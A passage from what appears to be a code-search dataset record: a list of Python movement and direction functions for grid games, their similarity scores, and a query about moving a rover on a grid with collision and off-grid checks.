curses.KEY_LEFT:\n direction = 1\n elif userinput == curses.KEY_RIGHT:\n direction = 0\n return direction", "def move(self, direction):\n # Ensure the move is valid\n assert self.is_move_valid(direction), \"Tried to make an invalid move\"\n # Calculate the move location.\n self._current_loc = self._calculate_move_location(direction)\n # Update the path.\n self._path.append(self._current_loc)\n # Increment the move cost.\n self._current_cost = self._current_cost + 1", "def position_to_state(self, row, col, dir):\r\n return dir + 4 * col + 4 * self.width * row", "def try_move(self, direction=None):\n if direction == 'rotate':\n return (self.origin, self.simple_rotate())\n else:\n return (self.get_new_origin(direction=direction), self.positions)", "def move(self, direction):\n pass", "def getDirection(self):\n if 'N' in str(self.trip_update.trip.trip_id):\n direction = 'northbound'\n if 'S' in str(self.trip_update.trip.trip_id):\n direction = 'southbound'\n return direction", "def getDirection(self, direction: str):\n return direction", "def move_length_52(self, move, new_state):\n # Then consider the internal1 move\n new1_state = new_state\n if move in [\"D\", \"P\", \"S\"]:\n for i in [[\"D\", 2, 4, 4, 1, 6, 10, 15, 20, 1,\n 0, 7, 12, 18, 24, 17],\n [\"P\", 9, 21, 14, 14, 16, 17, 18, 19,\n 0, 1, 3, 6, 10, 20, 1],\n [\"S\", 13, 23, 7, 14, 15, 16, 17, 19,\n 10, 0, 3, 7, 12, 24, 17]]:\n new1_state = self.loop54(move, new_state, i)\n\n # Then consider the internal2 move\n internal2 = \\\n [[\"G\", 5, 7, 8, 6, 2, 11, 17, 23, 16, 1, 3, 10, 15, 20, 1],\n [\"H\", 5, 6, 8, 6, 4, 11, 16, 21, 3, 0, 3, 12, 18, 24, 17],\n [\"K\", 5, 16, 22, 15, 9, 11, 12, 13, 8, 1, 3, 6, 15, 20, 1],\n [\"M\", 8, 17, 22, 5, 9, 10, 11, 13, 8, 0, 3, 7, 18, 24, 17],\n [\"Q\", 5, 10, 22, 15, 4, 7, 11, 21, 3, 14, 15, 17, 18, 19, 10],\n [\"R\", 8, 12, 22, 5, 2, 6, 11, 23, 16, 14, 15, 16, 18, 19, 10]]\n if move in [\"G\", \"H\", \"K\", \"M\", \"Q\", \"R\"]:\n for i in internal2:\n new1_state = self.loop55(move, new_state, i)\n\n # Finally consider the move \"L\"\n internal3 = [[\"L\", 9, 10, 12, 13, 8, 2, 6,\n 17, 23, 16, 4, 7, 16, 21, 3]]\n if move in [\"L\"]:\n for i in internal3:\n new1_state = self.loop56(move, new_state, i)\n return StonehengeState(not self.p1_turn, new1_state.length,\n new1_state.letters, new1_state.claim)", "def create_target_direction(net, net2, dir_type='states'):\n\n assert (net2 is not None)\n # direction between net2 and net\n if dir_type == 'weights':\n w = get_weights(net)\n w2 = get_weights(net2)\n direction = get_diff_weights(w, w2)\n elif dir_type == 'states':\n s = net.state_dict()\n s2 = net2.state_dict()\n direction = get_diff_states(s, s2)\n\n return direction", "def make_move(self, move):\n if type(move) == str:\n move = int(move)\n\n new_state = SubtractSquareState(not self.p1_turn,\n self.current_total - move)\n return new_state", "def move_not_inwards(s):\n if s.op == '~':\n NOT = lambda b: move_not_inwards(~b)\n a = s.args[0]\n if a.op == '~': return move_not_inwards(a.args[0]) # ~~A ==> A\n if a.op =='&': return associate('|', map(NOT, a.args))\n if a.op =='|': return associate('&', map(NOT, a.args))\n return s\n elif is_symbol(s.op) or not s.args:\n return s\n else:\n return Expr(s.op, *map(move_not_inwards, s.args))", "def connect(command):\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n stateNum = \"\"\r\n for ltr in command:\r\n if ltr.isnumeric():\r\n stateNum += ltr\r\n try:\r\n target_state = getState(int(stateNum))\r\n if target_state != None:\r\n if RESPONSEOPTIONS != []:\r\n RESPONSEOPTIONS[0] = target_state\r\n else:\r\n RESPONSEOPTIONS.append(target_state)\r\n else:\r\n print(\"Could not find state\")\r\n except Exception as e:\r\n print(\"<<<Error: Connecting state failed>>>\",e)", "def change_direction(self, direction):\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_UP:\r\n if self.direction == [0, 1]:\r\n self.direction == [0, 1]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [0, -1]\r\n return self.direction\r\n elif event.key == pygame.K_DOWN:\r\n if self.direction == [0, -1]:\r\n self.direction == [0, -1]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [0, 1]\r\n return self.direction\r\n elif event.key == pygame.K_LEFT:\r\n if self.direction == [1, 0]:\r\n self.direction == [1, 0]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [-1, 0]\r\n return self.direction\r\n elif event.key == pygame.K_RIGHT:\r\n if self.direction == [-1, 0]:\r\n self.direction == [-1, 0]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [1, 0]\r\n return self.direction", "def get_move(self, legal):\n move = Directions.STOP\n\n if not self.invert_right_left_controls:\n if ((self.WEST_KEY in self.keys or 'Left' in self.keys) and\n Directions.WEST in legal):\n move = Directions.WEST\n if ((self.EAST_KEY in self.keys or 'Right' in self.keys) and\n Directions.EAST in legal):\n move = Directions.EAST\n else:\n if ((self.WEST_KEY in self.keys or 'Left' in self.keys) and\n Directions.EAST in legal):\n move = Directions.EAST\n if ((self.EAST_KEY in self.keys or 'Right' in self.keys) and\n Directions.WEST in legal):\n move = Directions.WEST\n\n if not self.invert_up_down_controls:\n if ((self.NORTH_KEY in self.keys or 'Up' in self.keys) and\n Directions.NORTH in legal):\n move = Directions.NORTH\n if ((self.SOUTH_KEY in self.keys or 'Down' in self.keys) and\n Directions.SOUTH in legal):\n move = Directions.SOUTH\n else:\n if ((self.NORTH_KEY in self.keys or 'Up' in self.keys) and\n Directions.SOUTH in legal):\n move = Directions.SOUTH\n if ((self.SOUTH_KEY in self.keys or 'Down' in self.keys) and\n Directions.NORTH in legal):\n move = Directions.NORTH\n\n return move", "def get_direction(curr_pos, next_pos):\n if curr_pos == next_pos:\n return 'CLEAN'\n\n v_dist = next_pos[0] - curr_pos[0]\n h_dist = next_pos[1] - curr_pos[1]\n\n if h_dist != 0:\n if h_dist < 0:\n return 'LEFT'\n else:\n return 'RIGHT'\n else:\n if v_dist < 0:\n return 'UP'\n else:\n return 'DOWN'", "def shift(self, direction):\n direct, pos = tuple(direction)\n\n board = {'L': self.rows, 'R': self.rows, 'D': self.cols, 'U': self.cols}[direct]\n board[int(pos)].shift(direction=self.direct[direct])", "def convert_instruction(instruction: str) -> Tuple[int, int, int]:\n\t# NOOP\n\tif match := NOOP_REGEX.match(instruction):\n\t\tinstruction_type = 0\n\t# ADD\n\telif match := ADD_REGEX.match(instruction):\n\t\tinstruction_type = 1\n\t# MINUS\n\telif match := MINUS_REGEX.match(instruction):\n\t\tinstruction_type = 2\n\t# GOTO\n\telif match := GOTO_REGEX.match(instruction):\n\t\tinstruction_type = encode_label(match.group(\"TARGET\")) + 2\n\t# No match\n\telse:\n\t\traise ValueError(f\"Unrecognized instruction: {instruction}\")\n\t# get a and c from the label and variable capture groups\n\tlabel = encode_label(match.group(\"LABEL\"))\n\tvariable = encode_var(match.group(\"VAR\")) - 1\n\treturn label, instruction_type, variable", "def calMove(playerLocation, nextLocation):\n move_vector = tuple(np.subtract(nextLocation, playerLocation))\n for MOVE in DIRECTION_TO_CALCULATION:\n if move_vector == DIRECTION_TO_CALCULATION[MOVE]:\n return MOVE\n return \"Not right\"", "def make_move(state: str, section_num: int, move: str) -> str:\n if move == wf.CHECK:\n check_result = wf.check_section(state, section_num)\n if check_result:\n print('The section is correct')\n else:\n print('The section is incorrect')\n else:\n state = wf.change_state(state, section_num, move) \n return state", "def find_opposite(direction:str):\r\n if direction == 'u':\r\n return 'd'\r\n if direction == 'l':\r\n return 'r'\r\n if direction == 'r':\r\n return 'l'\r\n if direction == 'd':\r\n return 'u'", "def take_step(self, location, direction):\n if direction == RIGHT:\n step_location = (location[0]+1,location[1])\n elif direction == DOWN:\n step_location = (location[0], location[1]+1)\n else:\n return location\n\n if step_location[1] < self.rows and step_location[0] < self.columns:\n return step_location if self.is_space_open(step_location) else None", "def move(level, direction):\n levx, levy = len(level[0]), len(level)\n X, Y, state = GetPlayerXY(level)\n if direction == \"up\":\n if level[Y - 1][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y - 1][X] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y - 1][X]]\n elif Y > 1 and level[Y - 1][X] in \"oW\" and level[Y - 2][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y - 1][X] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y - 1][X]]\n level[Y - 2][X] = {\".\": \"o\", \"Z\": \"W\"}[level[Y - 2][X]]\n elif direction == \"down\":\n if level[Y + 1][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y + 1][X] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y + 1][X]]\n elif Y < levy - 2 and level[Y + 1][X] in \"oW\" and level[Y + 2][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y + 1][X] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y + 1][X]]\n level[Y + 2][X] = {\".\": \"o\", \"Z\": \"W\"}[level[Y + 2][X]]\n elif direction == \"left\":\n if level[Y][X - 1] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X - 1] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y][X - 1]]\n elif X > 1 and level[Y][X - 1] in \"oW\" and level[Y][X - 2] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X - 1] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y][X - 1]]\n level[Y][X - 2] = {\".\": \"o\", \"Z\": \"W\"}[level[Y][X - 2]]\n elif direction == \"right\":\n if level[Y][X + 1] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X + 1] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y][X + 1]]\n elif X < levx - 2 and level[Y][X + 1] in \"oW\" and level[Y][X + 2] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X + 1] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y][X + 1]]\n level[Y][X + 2] = {\".\": \"o\", \"Z\": \"W\"}[level[Y][X + 2]]", "def debuggerstep(self, action):\n\n\n\n #Calculate actual Next State you are supposed to reach via action\n if action == 0:\n nxtState = (self.state[0] - 1, self.state[1])\n elif action == 1:\n nxtState = (self.state[0], self.state[1] - 1)\n elif action == 2:\n nxtState = (self.state[0], self.state[1] + 1) \n elif action == 3: \n nxtState = (self.state[0] + 1, self.state[1])\n\n \n #BUT YOU CAN ONLY REACH THERE WITH 80% PROBABIBILITY\n #Stocasticity Implementation\n correctMove = random.random() \n \n #Check if nextState to reach is valid, Redundant Check (Might have to remove in future iterations)\n if self.isValid(nxtState): \n #If you have a valid next state, you reach there with 80% probability\n if correctMove <= 0.8: \n \n print(\"Ended up in correct state taking action \", end = \"\")\n if (action == 0): \n print(\"Up\")\n elif (action == 1): \n print(\"Left\")\n elif (action == 2): \n print(\"Right\")\n elif(action == 3): \n print(\"Down\")\n self.state = nxtState\n self.isEnd()\n return nxtState, self.giveReward(), self.isTerminal\n \n #Else you didn't end up in right place\n else: \n \n print(\"Ended up in wrong state. Had to go \", end = \"\")\n if (action == 0): \n print(\"Up \", end = \"\")\n elif (action == 1): \n print(\"Left \", end = \"\")\n elif (action == 2): \n print(\"Right \", end = \"\")\n elif(action == 3): \n print(\"Down \", end = \"\")\n \n print(\"And end up in \", end = \"\")\n print(nxtState)\n \n print(\"But ended up in: \", end = \"\")\n \n \n #Find remaining states that can be possibly reached: \n altActions =[]\n \n if action == 0:\n altActions.append(1)\n altActions.append(2)\n elif action == 1: \n altActions.append(0)\n altActions.append(3)\n elif action == 2: \n altActions.append(0)\n altActions.append(3)\n else: \n altActions.append(1)\n altActions.append(2)\n \n \n #Pick one random of all possible next states\n altAction = random.choice(altActions)\n #Check if alternate possibility is valid \n if altAction == 0:\n nxtState1 = (self.state[0] - 1, self.state[1])\n elif altAction == 1:\n nxtState1 = (self.state[0], self.state[1] - 1)\n elif altAction == 2:\n nxtState1 = (self.state[0], self.state[1] + 1) \n elif altAction == 3: \n nxtState1 = (self.state[0] + 1, self.state[1])\n \n \n \n #If alternate possibility is valid, update values\n if self.isValid(nxtState1): \n print(nxtState1)\n \n #Update Values \n self.state = nxtState1\n self.isEnd()\n return nxtState1, self.giveReward(), self.isTerminal\n \n #If alternate possibility is not valid, then you stay in place\n else: \n #Stay in place \n print(self.state)\n print(\"Stayed in Place!\")\n self.isEnd()\n return self.state, self.giveReward(), self.isTerminal\n else: \n #Stay in place \n print(self.state)\n print(\"Invalid action picked, Stayed in Place!\")\n self.isEnd()\n return self.state, self.giveReward(), self.isTerminal" ]
[ "0.6593464", "0.62368506", "0.61913526", "0.5976613", "0.57964754", "0.5683937", "0.5672923", "0.5668834", "0.5567708", "0.5457504", "0.5439745", "0.5427397", "0.54177237", "0.53752434", "0.5332933", "0.53058296", "0.53014976", "0.52971196", "0.5290954", "0.5269749", "0.52675956", "0.5265559", "0.5265479", "0.5265479", "0.5238769", "0.5232936", "0.5219115", "0.5213562", "0.5206062", "0.51773226", "0.51667154", "0.51660705", "0.51648617", "0.5164717", "0.5164462", "0.5143994", "0.5136238", "0.513283", "0.51308507", "0.5130536", "0.51293004", "0.51277876", "0.51201063", "0.5119316", "0.5116624", "0.51135033", "0.5113289", "0.5104634", "0.5095401", "0.50948757", "0.5091873", "0.50818753", "0.50750893", "0.5073835", "0.5066038", "0.5062011", "0.5060593", "0.50532776", "0.5052389", "0.5045146", "0.5041361", "0.5041133", "0.5022889", "0.50179344", "0.5016665", "0.50093323", "0.50084305", "0.5007903", "0.5006927", "0.5006424", "0.5000127", "0.49988088", "0.49982882", "0.49936894", "0.4991232", "0.49894702", "0.498925", "0.49887416", "0.4987766", "0.4986463", "0.49801567", "0.49781874", "0.49681035", "0.49645257", "0.4947153", "0.49447432", "0.49396786", "0.49369845", "0.49364364", "0.4934991", "0.4934674", "0.49338838", "0.4932872", "0.49295127", "0.49248737", "0.4924649", "0.49239734", "0.49212995", "0.49094602", "0.490821" ]
0.77884203
0
Returns a new coordinate after moving the rover, Based on the direction, it applies a movement of one grid and calculates the new coordinates. Its throws an exception if the new coordinate is off grid the new coordinate results in an collision with another rover
def _coordinate_after_moving(self, direction, coordinate): if direction == 'N': new_coordinate = Coordinate(coordinate.x, coordinate.y + 1) elif direction == 'S': new_coordinate = Coordinate(coordinate.x, coordinate.y - 1) elif direction == 'W': new_coordinate = Coordinate(coordinate.x - 1, coordinate.y) else: new_coordinate = Coordinate(coordinate.x + 1, coordinate.y) if not self._is_coordinate_in_the_grid(new_coordinate): raise RoverException(ExceptionMessages.OFF_GRID) if self._is_coordinate_occupied(new_coordinate): raise RoverException(ExceptionMessages.ROVER_COLLISION) return new_coordinate
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _calculate_move_location(self, direction):\n current_row = self._current_loc.get_row()\n current_column = self._current_loc.get_column()\n\n # Calculate the new location for a left move\n if (direction == \"l\"):\n return Location(current_row, current_column - 1)\n # Calculate the new location for an up move\n elif (direction == \"u\"):\n return Location(current_row - 1, current_column)\n # Calculate the new location for a right move\n elif (direction == \"r\"):\n return Location(current_row, current_column + 1)\n # Calculate the new location for a down move\n elif (direction == \"d\"):\n return Location(current_row + 1, current_column)\n return Location()", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def _do_move(game, main_grid, wallh_grid, wallv_grid,\n wallfills_grid, move, player, requested_players):\n # Extract destination coordinations.\n x = move[\"x\"]\n y = move[\"y\"]\n\n if move[\"type\"] == \"move\":\n for i in range(len(main_grid)):\n if player in main_grid[i]:\n py = i\n px = main_grid[i].index(player)\n main_grid[y][x] = player\n main_grid[py][px] = 0\n\n if move[\"type\"] == \"wall\" and move[\"direction\"] == \"h\":\n wallh_grid[y][x] = 1\n wallh_grid[y][x+1] = 1\n wallfills_grid[y][x] = 1\n if player == 1:\n game.player1_walls -= 1\n elif player == 2:\n game.player2_walls -= 1\n elif player == 3:\n game.player3_walls -= 1\n elif player == 4:\n game.player4_walls -= 1\n\n if move[\"type\"] == \"wall\" and move[\"direction\"] == \"v\":\n wallv_grid[y][x] = 1\n wallv_grid[y+1][x] = 1\n wallfills_grid[y][x] = 1\n if player == 1:\n game.player1_walls -= 1\n elif player == 2:\n game.player2_walls -= 1\n elif player == 3:\n game.player3_walls -= 1\n elif player == 4:\n game.player4_walls -= 1\n\n if requested_players == \"two\":\n if player == 1:\n game.turn = game.player2\n if player == 2:\n game.turn = game.player1\n if requested_players == \"four\":\n if player == 1:\n game.turn = game.player2\n if player == 2:\n game.turn = game.player3\n if player == 3:\n game.turn = game.player4\n if player == 4:\n game.turn = game.player1\n\n last_status = json.dumps({\"status\": \"playing\", \"turn\": game.turn.username})\n\n # Check to see if the game has been won. Apply scores if so.\n if check_win(main_grid, player):\n if requested_players == \"two\":\n players = {1: game.player1, 2: game.player2}\n winner = players[player]\n winner.two_player_wins += 1\n winner.total_score += 1\n winner.save()\n for p in players.values():\n if p == winner:\n continue\n p.two_player_losses += 1\n p.total_score -= 1\n p.save()\n if requested_players == \"four\":\n players = {1: game.player1, 2: game.player2,\n 3: game.player3, 4: game.player4}\n winner = players[player]\n winner.four_player_wins += 1\n winner.total_score += 3\n winner.save()\n for p in players.values():\n if p == winner:\n continue\n p.four_player_losses += 1\n p.total_score -= 1\n p.save()\n last_status = json.dumps({\"winner\": winner.username,\n \"status\": \"%s has won the game!\"\n % winner.username.capitalize()})\n \n # Update database.\n game.last_status = last_status\n game.main_grid = json.dumps(main_grid)\n game.wallh_grid = json.dumps(wallh_grid)\n game.wallv_grid = json.dumps(wallv_grid)\n game.wallfills_grid = json.dumps(wallfills_grid)\n game.save()\n\n return (last_status + \"\\n\" + game.main_grid + \"\\n\" + game.wallh_grid\n + \"\\n\" + game.wallv_grid + \"\\n\" + game.wallfills_grid\n + \"\\n\" + get_walls(game, requested_players))", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def move(self, direction):\n new_grid = []\n # get the indices of specific direction\n new_indices = self._grid_indices[direction]\n for cell in new_indices:\n lst = self.traversed_list(cell, direction)\n merged_list = merge(lst)\n new_grid.append(merged_list)\n \n adjusted_grid = adjust_grid(new_grid,direction)\n if self.is_changed(adjusted_grid):\n self.update_grid(adjusted_grid)\n self.new_tile()", "def move(self, direction):\n original_grid = []\n for row in self._grid:\n original_row = list(row)\n original_grid.append(original_row)\n steps = 0\n if direction == UP or direction == DOWN:\n steps = self._grid_height\n elif direction == LEFT or direction == RIGHT:\n steps = self._grid_width\n to_move = []\n for initial_cell in self._initial_cells[direction]:\n for step in range(steps):\n new_row = initial_cell[0] + step * OFFSETS[direction][0]\n new_column = initial_cell[1] + step * OFFSETS[direction][1]\n to_move.append(self._grid[new_row][new_column])\n to_move = merge(to_move)\n row = initial_cell[0]\n column = initial_cell[1]\n for step in range(steps):\n self._grid[row + OFFSETS[direction][0] * step][column + OFFSETS[direction][1] * step] = to_move[step]\n to_move = []\n if original_grid != self._grid:\n self.new_tile()", "def move(self, direction):\n if direction in (UP, DOWN):\n num_steps = self._grid_height\n elif direction in (LEFT, RIGHT):\n num_steps = self._grid_width\n moved = False\n temp_list = []\n for start_cell in self._move_dir[direction]:\n # step 1: iterate through each line, write results to temp list\n for step in range(num_steps):\n row = start_cell[0] + step * OFFSETS[direction][0]\n col = start_cell[1] + step * OFFSETS[direction][1]\n temp_list.append(self._cells[row][col])\n # step 2: merge temp list\n temp_list_snap = temp_list[:]\n temp_list = merge(temp_list)\n print(temp_list_snap, temp_list)\n if temp_list_snap != temp_list:\n moved = True\n # step 3: store merged temp list back on grid\n idx = 0\n for step in range(num_steps):\n row = start_cell[0] + step * OFFSETS[direction][0]\n col = start_cell[1] + step * OFFSETS[direction][1]\n if direction in (UP, DOWN):\n self._cells[row][col] = temp_list[idx]\n idx += 1\n elif direction in (LEFT, RIGHT):\n self._cells[row][col] = temp_list[idx]\n idx += 1\n temp_list = []\n if moved:\n self.new_tile()\n moved = False\n score = sum(map(sum, self._cells))\n print(\"Your score: %s\" % score)\n #return self._cells", "def move(self, direction):\n change_check = False\n for tile in self.dir_dict[direction]:\n if direction == UP or direction == DOWN:\n temp_list = []\n for step in range(self.grid_height):\n temp_list.append(self.grid[tile[0] + step * OFFSETS[direction][0]]\n [tile[1] + step * OFFSETS[direction][1]])\n if not temp_list == merge(temp_list):\n change_check = True\n temp_list = merge(temp_list)\n for step in range(self.grid_height):\n self.grid[tile[0] + step * OFFSETS[direction][0]] \\\n [tile[1] + step * OFFSETS[direction][1]] \\\n = temp_list[step]\n if direction == LEFT or direction == RIGHT:\n temp_list = []\n for step in range(self.grid_width):\n temp_list.append(self.grid[tile[0] + step * OFFSETS[direction][0]]\n [tile[1] + step * OFFSETS[direction][1]])\n if not temp_list == merge(temp_list):\n change_check = True\n temp_list = merge(temp_list)\n for step in range(self.grid_width):\n self.grid[tile[0] + step * OFFSETS[direction][0]] \\\n [tile[1] + step * OFFSETS[direction][1]] \\\n = temp_list[step]\n if change_check == True:\n self.new_tile()", "def getMovement(self):\n # store the robot's current location and set the directional movement to 0,0 so that the robot won't move by default\n currentLocation = (self.me['x'], self.me['y'])\n directionalMovement = (0,0)\n\n # ensure that target location is not none and not equal to the current location\n if self.targetLocation and not currentLocation == self.targetLocation:\n\n # store the direction, directional movement, and the new map location we will trying to move the robot to this round\n direction = self.getDirection(currentLocation, self.targetLocation)\n directionalMovement = self.getDirectionalMovement(currentLocation, direction)\n newLocation = self.getNewLocation(currentLocation, directionalMovement)\n\n # store the current direction for use later\n initialDirection = direction\n\n # by default, the robot is ready to move in the event that the new map location is already passable\n readyToMove = True\n\n # while the new map location is not passable\n while not self.isPassable(newLocation):\n # if unit is a crusader moving diagonally at their fastest pace, set their directional movement to (1,1)\n if self.isCrusader and directionalMovement[0] == 2 and directionalMovement[1] == 2:\n directionalMovement[0] = 1\n directionalMovement[1] = 1\n # or if the unit is traveling faster than 1 block East\n elif directionalMovement[0] > 1:\n # lower the unit's movement East by 1 block\n directionalMovement[0] -= 1\n # or if the unit is traveling faster than 1 block West\n elif directionalMovement[0] < -1:\n # lower the unit's movement West by 1 block\n directionalMovement[0] += 1\n # or if the unit is traveling faster than 1 block South\n elif directionalMovement[1] > 1:\n # lower the unit's movement South by 1 block\n directionalMovement[1] -= 1\n # or if the unit is traveling faster than 1 block North\n elif directionalMovement[1] < -1:\n # lower the unit's movement North by 1 block\n directionalMovement[1] += 1\n # else the unit is already moving the shortest distance they can in the current direction\n else:\n # rotate the robots direction clockwise and proceed\n direction = self.getRotatedDirection(direction, 1)\n\n # if we ened up facing the same direction we started in\n if direction == initialDirection:\n # let the code know we're not ready to move\n readyToMove = False\n # break out of the while loop\n break\n\n # overwrite the directional movement with a new one based on the direction we just got\n directionalMovement = self.getDirectionalMovement(currentLocation, direction)\n\n # overwrite the new location with the location we get from the directional movement we just got\n newLocation = self.getNewLocation(currentLocation, directionalMovement)\n\n # if the robot ended up not being ready to move\n if not readyToMove:\n # change the directional movement back to (0,0) so that it doesn't move\n directionalMovement = (0,0)\n else :\n self.targetLocation = self.getRandomPassableLocation()\n # return the directional movement\n return directionalMovement", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def getMove(self, grid):\n\t\tmove = self.performIterativeDepthSearch(grid)\n\t\tendtime = time.clock()\n\t\t#print (endtime - starttime)\n\t\treturn move", "def move(self, direction):\n\n # Move to the right\n if direction == 'right':\n if self.square_x < (NUMBER_OF_SPRITES -1):\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y][self.square_x + 1] != 'w':\n # Move by one square right on X axis\n self.square_x += 1\n # Calculation of the \"Real\" positioning in pixels\n self.x_pos = self.square_x * SPRITES_SIZE\n\n # Move to the left\n if direction == 'left':\n if self.square_x > 0:\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y][self.square_x - 1] != 'w':\n # Move by one square left on X axis\n self.square_x -= 1\n # Calculation of the \"Real\" positioning in pixels\n self.x_pos = self.square_x * SPRITES_SIZE\n\n # Move up\n if direction == 'up':\n if self.square_y > 0:\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y-1][self.square_x] != 'w':\n # Move by one square up on Y axis\n self.square_y -= 1\n # Calculation of the \"Real\" positioning in pixels\n self.y_pos = self.square_y * SPRITES_SIZE\n\n # Move down\n if direction == 'down':\n if self.square_y < (NUMBER_OF_SPRITES -1):\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y + 1][self.square_x] != 'w':\n # Move by one square down on Y axis\n self.square_y += 1\n # Calculation of the \"Real\" positioning in pixels\n self.y_pos = self.square_y * SPRITES_SIZE", "def apply_move(cell, x, y):\r\n x2 = (co_ords[cell])[0] + x\r\n y2 = (co_ords[cell])[1] + y\r\n return (x2, y2)", "def advance(self,distance = 1):\n colOffset = 0\n rowOffset = 0\n if self.currentOrientation == GridOrientation.left:\n colOffset = -1 * distance\n if self.currentOrientation == GridOrientation.right:\n colOffset = distance\n if self.currentOrientation == GridOrientation.down:\n rowOffset = -1 * distance\n if self.currentOrientation == GridOrientation.up:\n rowOffset = distance\n self.currentCol += colOffset\n self.currentRow += rowOffset\n \n #See if we've expanded the grid\n if self.currentCol > self.maxCol:\n self.maxCol = self.currentCol\n if self.currentCol < self.minCol:\n self.minCol = self.currentCol\n if self.currentRow > self.maxRow:\n self.maxRow = self.currentRow\n if self.currentRow < self.minRow:\n self.minRow = self.currentRow\n \n return self.getCoordinate()", "def new_move(self, grid_x, grid_y, player):\n #duplication /!\\\n if player == self.X:\n self.draw_X(grid_x, 